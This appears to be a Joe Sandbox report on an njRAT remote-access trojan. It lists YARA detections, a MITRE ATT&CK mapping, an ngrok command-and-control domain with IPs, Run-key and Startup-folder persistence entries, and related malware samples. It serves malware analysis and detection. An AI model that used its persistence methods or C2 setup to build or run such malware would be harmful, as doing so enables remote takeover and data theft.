Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Njrat

Source: Yara match	File source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nOZ2Oqnzbz.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nOZ2Oqnzbz.exe PID: 6500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsServices.exe PID: 2668, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsServices.exe PID: 1896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsServices.exe PID: 3484, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsServices.exe PID: 6516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsServices.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsServices.exe PID: 6400, type: MEMORYSTR

Remote Access Functionality

Yara detected Njrat

Source: Yara match	File source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nOZ2Oqnzbz.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nOZ2Oqnzbz.exe PID: 6500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsServices.exe PID: 2668, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsServices.exe PID: 1896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsServices.exe PID: 3484, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsServices.exe PID: 6516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsServices.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsServices.exe PID: 6400, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	211 Scripting	Valid Accounts	1 Windows Management Instrumentation	211 Scripting	1 DLL Side-Loading	31 Disable or Modify Tools	1 Input Capture	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	21 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	LSASS Memory	12 System Information Discovery	Remote Desktop Protocol	1 Input Capture	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	221 Registry Run Keys / Startup Folder	311 Process Injection	2 Obfuscated Files or Information	Security Account Manager	311 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	221 Registry Run Keys / Startup Folder	3 Software Packing	NTDS	231 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	11 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	231 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	311 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
nOZ2Oqnzbz.exe	87%	ReversingLabs	Win32.Trojan.Skeeeyah
nOZ2Oqnzbz.exe	86%	Virustotal		Browse
nOZ2Oqnzbz.exe	100%	Avira	BDS/Poison.mon
nOZ2Oqnzbz.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe	100%	Avira	BDS/Poison.mon
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\WindowsServices.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\WindowsServices.exe	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy)	0%	Virustotal		Browse
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe	87%	ReversingLabs	Win32.Trojan.Skeeeyah
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe	86%	Virustotal		Browse
C:\Users\user\Desktop\nOZ2Oqnzbz.exe	0%	ReversingLabs
C:\Users\user\Desktop\nOZ2Oqnzbz.exe	0%	Virustotal		Browse
C:\Users\user\Desktop\nOZ2Oqnzbz.exex (copy)	0%	ReversingLabs
C:\Users\user\Desktop\nOZ2Oqnzbz.exex (copy)	0%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
0.tcp.in.ngrok.io	9%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
0.tcp.in.ngrok.io	9%	Virustotal		Browse
0.tcp.in.ngrok.io	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
0.tcp.in.ngrok.io	3.6.115.64	true	true	9%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
0.tcp.in.ngrok.io	true	9%, Virustotal, Browse Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
3.6.115.182	unknown	United States	16509	AMAZON-02US	true
3.6.115.64	0.tcp.in.ngrok.io	United States	16509	AMAZON-02US	true
3.6.98.232	unknown	United States	16509	AMAZON-02US	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1388810
Start date and time:	2024-02-08 06:51:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	nOZ2Oqnzbz.exe renamed because original name is a hash value
Original Sample Name:	acb30a04da7096c99877b47f3050190d.exe
Detection:	MAL
Classification:	mal100.phis.troj.adwa.spyw.expl.evad.winEXE@30/9@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 94 Number of non-executed functions: 19
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:51:52	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs
05:52:12	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46 "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
05:52:21	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46 "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
05:52:29	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46 "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
05:52:38	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe
06:52:16	API Interceptor	262924x Sleep call for process: WindowsServices.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3.6.115.182	RN2vknsx6G.exe	Get hash	malicious	RedLine	Browse	0.tcp.in.ngrok.io:17440/
3.6.115.64	ZB7Ot9MOic.exe	Get hash	malicious	Njrat	Browse
	etJZk4UQhS.exe	Get hash	malicious	Njrat	Browse
	jango.exe	Get hash	malicious	XWorm	Browse
	cracksetup.exe	Get hash	malicious	Nanocore	Browse
	LocalStaFvjUblU.exe	Get hash	malicious	njRat	Browse
	558EofiXYO.exe	Get hash	malicious	njRat	Browse
	JsYdl3ZkOA.exe	Get hash	malicious	njRat	Browse
	ehqsU9jDFb.exe	Get hash	malicious	njRat	Browse
	EADSXus8Cw.exe	Get hash	malicious	njRat	Browse
	KPiASQ9E43.exe	Get hash	malicious	Njrat	Browse
3.6.98.232	iR2UtZj5vP.exe	Get hash	malicious	Njrat	Browse
	ZB7Ot9MOic.exe	Get hash	malicious	Njrat	Browse
	etJZk4UQhS.exe	Get hash	malicious	Njrat	Browse
	jango.exe	Get hash	malicious	XWorm	Browse
	cracksetup.exe	Get hash	malicious	Nanocore	Browse
	LocalStaFvjUblU.exe	Get hash	malicious	njRat	Browse
	JsYdl3ZkOA.exe	Get hash	malicious	njRat	Browse
	ehqsU9jDFb.exe	Get hash	malicious	njRat	Browse
	EADSXus8Cw.exe	Get hash	malicious	njRat	Browse
	KPiASQ9E43.exe	Get hash	malicious	Njrat	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
0.tcp.in.ngrok.io	iR2UtZj5vP.exe	Get hash	malicious	Njrat	Browse	3.6.122.107
	ZB7Ot9MOic.exe	Get hash	malicious	Njrat	Browse	3.6.30.85
	etJZk4UQhS.exe	Get hash	malicious	Njrat	Browse	3.6.122.107
	jango.exe	Get hash	malicious	XWorm	Browse	3.6.30.85
	cracksetup.exe	Get hash	malicious	Nanocore	Browse	3.6.98.232
	LocalStaFvjUblU.exe	Get hash	malicious	njRat	Browse	3.6.122.107
	558EofiXYO.exe	Get hash	malicious	njRat	Browse	3.6.115.64
	JsYdl3ZkOA.exe	Get hash	malicious	njRat	Browse	3.6.115.64
	ehqsU9jDFb.exe	Get hash	malicious	njRat	Browse	3.6.115.182
	EADSXus8Cw.exe	Get hash	malicious	njRat	Browse	3.6.30.85

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	DjjEcDvMht.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	99.84.208.24
	https://www.dropbox.com/scl/fi/wihffpfulcq7k54sy0wep/Docs2024_08_02_99489_2837.pdf?rlkey=t3vgq79fnqwj7d5ljkmjzcgrx&dl=0	Get hash	malicious	Unknown	Browse	3.163.101.33
	Solicitud de precio (ORDEN DE COMPRA A4-000004024).bat.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	13.248.169.48
	5Jrztt780M.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	13.225.63.72
	file.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	3.163.101.39
	e4iTc2lcEI.elf	Get hash	malicious	Gafgyt	Browse	34.249.145.219
	5YHWYgenk4.elf	Get hash	malicious	Gafgyt	Browse	34.243.160.129
	99aEp0eNqa.elf	Get hash	malicious	Gafgyt	Browse	34.249.145.219
	https://bigassfans.com/	Get hash	malicious	Unknown	Browse	52.85.61.104
	https://indd.adobe.com/view/f59c3477-e403-4705-9b6a-e219aa9c5e4c	Get hash	malicious	Unknown	Browse	75.2.57.54
AMAZON-02US	DjjEcDvMht.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	99.84.208.24
	https://www.dropbox.com/scl/fi/wihffpfulcq7k54sy0wep/Docs2024_08_02_99489_2837.pdf?rlkey=t3vgq79fnqwj7d5ljkmjzcgrx&dl=0	Get hash	malicious	Unknown	Browse	3.163.101.33
	Solicitud de precio (ORDEN DE COMPRA A4-000004024).bat.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	13.248.169.48
	5Jrztt780M.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	13.225.63.72
	file.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	3.163.101.39
	e4iTc2lcEI.elf	Get hash	malicious	Gafgyt	Browse	34.249.145.219
	5YHWYgenk4.elf	Get hash	malicious	Gafgyt	Browse	34.243.160.129
	99aEp0eNqa.elf	Get hash	malicious	Gafgyt	Browse	34.249.145.219
	https://bigassfans.com/	Get hash	malicious	Unknown	Browse	52.85.61.104
	https://indd.adobe.com/view/f59c3477-e403-4705-9b6a-e219aa9c5e4c	Get hash	malicious	Unknown	Browse	75.2.57.54
AMAZON-02US	DjjEcDvMht.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	99.84.208.24
	https://www.dropbox.com/scl/fi/wihffpfulcq7k54sy0wep/Docs2024_08_02_99489_2837.pdf?rlkey=t3vgq79fnqwj7d5ljkmjzcgrx&dl=0	Get hash	malicious	Unknown	Browse	3.163.101.33
	Solicitud de precio (ORDEN DE COMPRA A4-000004024).bat.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	13.248.169.48
	5Jrztt780M.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	13.225.63.72
	file.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	3.163.101.39
	e4iTc2lcEI.elf	Get hash	malicious	Gafgyt	Browse	34.249.145.219
	5YHWYgenk4.elf	Get hash	malicious	Gafgyt	Browse	34.243.160.129
	99aEp0eNqa.elf	Get hash	malicious	Gafgyt	Browse	34.249.145.219
	https://bigassfans.com/	Get hash	malicious	Unknown	Browse	52.85.61.104
	https://indd.adobe.com/view/f59c3477-e403-4705-9b6a-e219aa9c5e4c	Get hash	malicious	Unknown	Browse	75.2.57.54

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy)	iR2UtZj5vP.exe	Get hash	malicious	Njrat	Browse
	l0HzgCOAMF.exe	Get hash	malicious	Njrat	Browse
	clSwWjTkJf.exe	Get hash	malicious	Njrat	Browse
	_____(NYCU_2307-19TW)#Ufffdpdf.exe	Get hash	malicious	Nanocore, GuLoader, MailPassView, Remcos	Browse
	1_#Ud611#Ub825#Uc0ac_Hot_Line_#Uc900#Uc218_#Ud611#Uc870_#Uc694#Uccad#Uc758#Uac74.exe	Get hash	malicious	NanoCore, GuLoader	Browse
	DHL_IMPORT_TAX__INVOICE_3129143010_KRJ202318092409s.exe	Get hash	malicious	Nanocore, GuLoader	Browse
	0473350311911207E#U00b7pdf.exe	Get hash	malicious	NanoCore, GuLoader, MailPassView, Remcos	Browse
	PO#2301-DBOU5200338-6452951_-_DR_0-TTQT.TT.01_nh#U1ea5t_2023.exe	Get hash	malicious	NanoCore, GuLoader	Browse
	2301_20230101_REGIA_BUILDING_KFT__443512415141300_NYUGTA#U00b7pdf.exe	Get hash	malicious	NanoCore, GuLoader	Browse
	DIEN_CHUYEN_TIEN_SacomBank-TT_20230421-1191736-80192949.exe	Get hash	malicious	NanoCore, GuLoader	Browse
C:\Users\user\AppData\Local\Temp\WindowsServices.exe	iR2UtZj5vP.exe	Get hash	malicious	Njrat	Browse
	l0HzgCOAMF.exe	Get hash	malicious	Njrat	Browse
	clSwWjTkJf.exe	Get hash	malicious	Njrat	Browse
	_____(NYCU_2307-19TW)#Ufffdpdf.exe	Get hash	malicious	Nanocore, GuLoader, MailPassView, Remcos	Browse
	1_#Ud611#Ub825#Uc0ac_Hot_Line_#Uc900#Uc218_#Ud611#Uc870_#Uc694#Uccad#Uc758#Uac74.exe	Get hash	malicious	NanoCore, GuLoader	Browse
	DHL_IMPORT_TAX__INVOICE_3129143010_KRJ202318092409s.exe	Get hash	malicious	Nanocore, GuLoader	Browse
	0473350311911207E#U00b7pdf.exe	Get hash	malicious	NanoCore, GuLoader, MailPassView, Remcos	Browse
	PO#2301-DBOU5200338-6452951_-_DR_0-TTQT.TT.01_nh#U1ea5t_2023.exe	Get hash	malicious	NanoCore, GuLoader	Browse
	2301_20230101_REGIA_BUILDING_KFT__443512415141300_NYUGTA#U00b7pdf.exe	Get hash	malicious	NanoCore, GuLoader	Browse
	DIEN_CHUYEN_TIEN_SacomBank-TT_20230421-1191736-80192949.exe	Get hash	malicious	NanoCore, GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\WindowsServices.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\WindowsServices.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	525
Entropy (8bit):	5.259753436570609
Encrypted:	false
SSDEEP:	12:Q3LaJU2C9XAn10Ug+9pfu9t0U29xtUz1B0U2uk71K6xhk7v:MLF2CpI3zffup29Iz52Ve
MD5:	260E01CC001F9C4643CA7A62F395D747
SHA1:	492AD0ACE3A9C8736909866EEA168962D418BE5A
SHA-256:	4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
SHA-512:	01AF7D75257E3DBD460E328F5C057D0367B83D3D9397E89CA3AE54AB9B2842D62352D8CCB4BE98ACE0C5667846759D32C199DE39ECCD0CF9CD6A83267D27E7C4
Malicious:	false
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\bec14584c93014efbc76285c35d1e891\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\7d443c6c007fe8696f9aa6ff1da53ef7\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\2cdaeaf53e3d49038cf7cb0ce9d805d3\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d0e5535854cce87ea7f2d69d0594b7a8\System.Windows.Forms.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\nOZ2Oqnzbz.exe.log

Download File

Process:	C:\Users\user\Desktop\nOZ2Oqnzbz.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	525
Entropy (8bit):	5.259753436570609
Encrypted:	false
SSDEEP:	12:Q3LaJU2C9XAn10Ug+9pfu9t0U29xtUz1B0U2uk71K6xhk7v:MLF2CpI3zffup29Iz52Ve
MD5:	260E01CC001F9C4643CA7A62F395D747
SHA1:	492AD0ACE3A9C8736909866EEA168962D418BE5A
SHA-256:	4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
SHA-512:	01AF7D75257E3DBD460E328F5C057D0367B83D3D9397E89CA3AE54AB9B2842D62352D8CCB4BE98ACE0C5667846759D32C199DE39ECCD0CF9CD6A83267D27E7C4
Malicious:	false
